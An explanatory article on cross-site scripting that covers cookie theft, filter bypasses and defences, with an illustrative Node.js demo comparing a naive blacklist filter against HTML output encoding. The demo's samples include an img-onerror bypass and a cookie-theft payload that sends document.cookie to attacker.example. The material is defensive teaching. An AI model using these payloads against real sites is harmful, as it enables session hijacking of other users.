What is XSS?


XSS is an abbreviation for Cross Site Scripting. It refers to a class of web application vulnerability in which an attacker gets script of their own choosing into a page that other users view, so that those users' browsers run it as if it were the site's own code, with whatever the site has granted to scripts from its origin. Comment fields are the classic entry point: a comment containing HTML or JavaScript is stored by the site and served back, unchanged, to everyone who reads the thread. Most sites apply some filter to submitted text, but filters that look for known bad patterns are routinely bypassed, because HTML offers many ways to run script besides the obvious <script> tag. The reliable defence is for the site to encode user-supplied text on output so the browser can only treat it as text, never as markup; without that, almost any site that displays what users post is susceptible to Cross Site Scripting.

Much of the time Cross Site Scripting is used for nothing worse than popping a JavaScript alert on a popular page such as a news article, but the same foothold supports far more serious attacks, phishing among them. Cookie theft is the common case: because the injected script runs in the context of the vulnerable site, it can read that site's cookies and send them to the attacker, and with a stolen session cookie the attacker can act as the victim on the site. The script can also rewrite the page, for example to point links at look-alike sites the attacker controls, to inject advertising, or to submit forms that change the victim's account settings. New XSS flaws are published every week, each with a different injection point and a different effect on the victim. Major sites including Yahoo, Paypal, Ebay, CNN, Microsoft, and FBI.com have had successful XSS attacks reported against them. XSS does not depend on an unencrypted connection: HTTPS (the lock icon in the browser) protects data in transit, not the content of the page, so a secure site is as exposed to XSS as any other.
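The two points above, that a pattern filter is easy to bypass and that the injected script can read the site's cookies, are shown below in a small Node.js example added to this page; it is not code from the original article or from any of the sites it names. The filter, the rendering functions, the comments and the attacker.example host are all constructed for illustration.

```javascript
// Added example (not from the original page): a stored-XSS comment slipping
// past a naive blacklist filter, next to the output encoding that stops it.
// Every comment string and the attacker.example host below are constructed.

// A blacklist filter of the kind many comment systems rely on: it removes
// <script> and </script> tags and nothing else.
function naiveFilter(comment) {
  return comment.replace(/<\s*\/?\s*script[^>]*>/gi, "");
}

// Vulnerable rendering: the filtered comment is concatenated straight into
// the page's HTML, so any markup that survived the filter becomes live.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${naiveFilter(comment)}</li>`;
}

// Correct rendering: encode every HTML metacharacter so the browser can
// only ever treat the comment as text, whatever it contains.
function escapeHtml(s) {
  const map = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;",
    '"': "&quot;", "'": "&#39;", "`": "&#96;",
  };
  return s.replace(/[&<>"'`]/g, (c) => map[c]);
}
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Crude stand-in for "would the browser run script here": does the rendered
// HTML still contain a <script> element or a tag carrying an on* handler?
function containsActiveMarkup(html) {
  return /<script\b|<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Constructed sample comments.
const payloads = {
  // What the filter was written to catch.
  scriptTag: "<script>alert(document.cookie)</script>",
  // Classic bypass: no <script> tag at all; the handler fires when the
  // broken image fails to load.
  imgOnError: '<img src=x onerror="alert(document.cookie)">',
  // The cookie-theft variant from the text: the handler ships
  // document.cookie to a host the attacker controls (hypothetical domain).
  cookieTheft:
    '<img src=x onerror="(new Image).src=\'https://attacker.example/c?\'' +
    '+encodeURIComponent(document.cookie)">',
};

// For each comment, does script survive under the vulnerable and the
// encoded rendering? Returns { name: { unsafe: bool, safe: bool } }.
function demo() {
  const results = {};
  for (const [name, p] of Object.entries(payloads)) {
    results[name] = {
      unsafe: containsActiveMarkup(renderCommentUnsafe(p)),
      safe: containsActiveMarkup(renderCommentSafe(p)),
    };
  }
  return results;
}

if (typeof module !== "undefined" && require.main === module) {
  console.table(demo());
}
```

Running it shows the filter catching only the comment it was written for: the img/onerror variants pass straight through the "unsafe" path and would execute in every reader's browser, while the encoded path neutralises all three. Two caveats a practitioner would add: encoding must match the context (text inside an attribute, a URL or a script block each need different treatment, and the function above covers only HTML text and attribute values), and marking the session cookie HttpOnly denies document.cookie to script, which blunts the theft payload even where an injection exists.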

There is no complete defence on the user's side, because the injected script is indistinguishable from the site's own and every browser will run it; choosing one browser over another does not make you immune to XSS. What you can do is keep your browser fully patched, since XSS payloads are sometimes paired with browser bugs that reach the operating system, and be wary of links received by email, even from people you trust: reflected XSS is delivered as a crafted URL, and the attack happens the moment you open it. For any site you hold an account on, type the address into the address bar yourself rather than following a link. If you do follow a link and the page behaves oddly, such as opening in a different browser than you expected or showing prompts the site never normally shows, close the window and change your password for that site. The real fix lies with the site: encode user-supplied text on output so it can never be interpreted as markup, and mark session cookies HttpOnly so that script cannot read them, which blunts the cookie-theft attack described above.
